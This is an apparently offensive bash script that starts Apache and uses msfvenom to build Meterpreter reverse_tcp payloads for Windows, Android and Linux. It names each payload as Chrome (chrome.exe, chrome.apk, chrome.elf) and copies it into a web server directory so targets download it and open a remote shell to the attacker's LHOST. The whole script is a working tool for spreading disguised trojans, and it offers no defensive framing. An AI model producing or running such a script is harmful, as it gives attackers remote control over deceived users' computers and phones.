#!/bin/bash
echo "[*]Starting apache server"
service apache start &> /dev/null
service apache1 start &> /dev/null
service apache2 start &> /dev/null
service apache3 start &> /dev/null
read -p "Enter your LHOST: " host
echo
read -p "Enter your full apache server path: " path
echo
read -p "Enter system type (x86,x64): " types
echo
echo "[*]Startng msfvenom"
sleep 0.5
echo "[*]Making Windows payload"
msfvenom -p windows/meterpreter/reverse_tcp LHOST=$host LPORT=4444 >/root/.SEF/chrome.exe 
mv /root/.SEF/chrome.exe $path
echo "[*]Setting up server"
echo
echo "[*]Making Android payload"
msfvenom -p android/meterpreter/reverse_tcp LHOST=$host LPORT=5555  >/root/.SEF/chrome.apk 
mv /root/.SEF/chrome.apk $path
echo "[*]Setting up server"
echo "[*]Making Linux payload"
msfvenom -p linux/$types/meterpreter/reverse_tcp LHOST=$host LPORT=6666  >/root/.SEF/chrome.elf
mv /root/.SEF/chrome.elf $path
echo "[*]Setting up server"
opreation=$?
if [ $opreation == 0 ]
then 
	echo "Done"
else
echo "Error maybe you dont install metasploit or dont install apache server"
fi
